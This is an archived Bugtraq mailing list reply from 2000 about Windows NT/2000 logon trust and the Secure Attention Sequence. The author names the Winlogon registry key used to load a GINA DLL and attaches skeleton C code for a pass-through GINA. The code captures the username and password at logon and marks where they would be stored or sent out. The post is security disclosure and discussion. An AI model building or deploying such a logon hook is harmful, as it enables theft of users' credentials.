Bugtraq mailing list archives

Re: Windows 2000 Run As... Feature

From: jdglaser () NTOBJECTIVES COM (jdglaser)
Date: Mon, 24 Jan 2000 06:31:31 -0800


That's a good point.
I'd like to add that MS Secure Attention Sequence is not exactly so
trusted.
Nothing prevents another Gina from being put into play, nor prevents
process code injection - DLL API hooking.

One way to do this can be done by altering the reg key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
to implement a Pass-Through Gina (one which grabs your password and then
calls through to the real Gina)

While SAS prevents the old-style pop and disappear logon screens, it does
nothing to prevent password interception by trojan dll injection.

Both of these compromise the trust of the current SAS implemetation.

In light of that, I'm not sure another password path matters.

Just my thoughts,
jdg

Attached is an example of GINA pass-through code - pop the below listed
code into a dll, write the dll name as the value to the above listed key
and SAS now has an untrusted element.

int WINAPI WlxLoggedOutSAS (PVOID pWlxContext,   DWORD dwSasType,
                            PLUID pAuthenticationId, PSID pLogonSid,
                               PDWORD pdwOptions, PHANDLE phToken,
                           PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
                            PVOID *pProfile)
{
        //call real gina api
   iRet = GWlxLoggedOutSAS (pWlxContext,  dwSasType, pAuthenticationId,
pLogonSid,
                                            pdwOptions,  phToken,  pMprNotifyInfo,
 pProfile);

       pMprNotifyInfo->pszUserName, <-Grab this
       pMprNotifyInfo->pszPassword, <-Grab this
         <insert whatever>
      hFile = CreateFile (); <-Store it, send it, mail it
         WriteFile ();
         CloseHandle (hFile);

   return iRet;

}

-----Original Message-----
From:   David Terrell [SMTP:dbt () meat net]
Sent:   Friday, January 21, 2000 3:49 PM
To:     BUGTRAQ () SECURITYFOCUS COM
Subject:        Windows 2000 Run As... Feature

this is the first time (I know of) that the system asks for your password
through a mechanism other than the trusted path (ctrl-alt-del to
login,

Current thread:

Re: Windows 2000 Run As... Feature, (continued)
- Re: Windows 2000 Run As... Feature Steven Kastl (Jan 23)
- Re: Windows 2000 Run As... Feature Jesper M. Johansson (Jan 24)
  - Re: Windows 2000 Run As... Feature David LeBlanc (Jan 25)
    - Re: Windows 2000 Run As... Feature Ben Russell (Jan 25)
    - Re: Windows 2000 Run As... Feature Steve Wolfe (Jan 26)
    - Re: Windows 2000 Run As... Feature Kenn Humborg (Jan 27)
    - SAS behavior in Windows NT - RE: Windows 2000 Run As... Feature jdglaser (Jan 26)
    - Re: SAS behavior in Windows NT - RE: Windows 2000 Run As... Feature Jesper M. Johansson (Jan 26)
    - Re: SAS behavior in Windows NT - RE: Windows 2000 Run As... Feature Peter Berendi (Jan 27)
    - Re: SAS behavior in Windows NT - RE: Windows 2000 Run As... Feature David LeBlanc (Jan 26)
- Re: Windows 2000 Run As... Feature jdglaser (Jan 24)
  - Re: Windows 2000 Run As... Feature Camillo Särs (Jan 24)
  - multicasts from hell Tim Yardley (Jan 25)
  - Re: Windows 2000 Run As... Feature David LeBlanc (Jan 25)
- Re: Windows 2000 Run As... Feature jdglaser (Jan 25)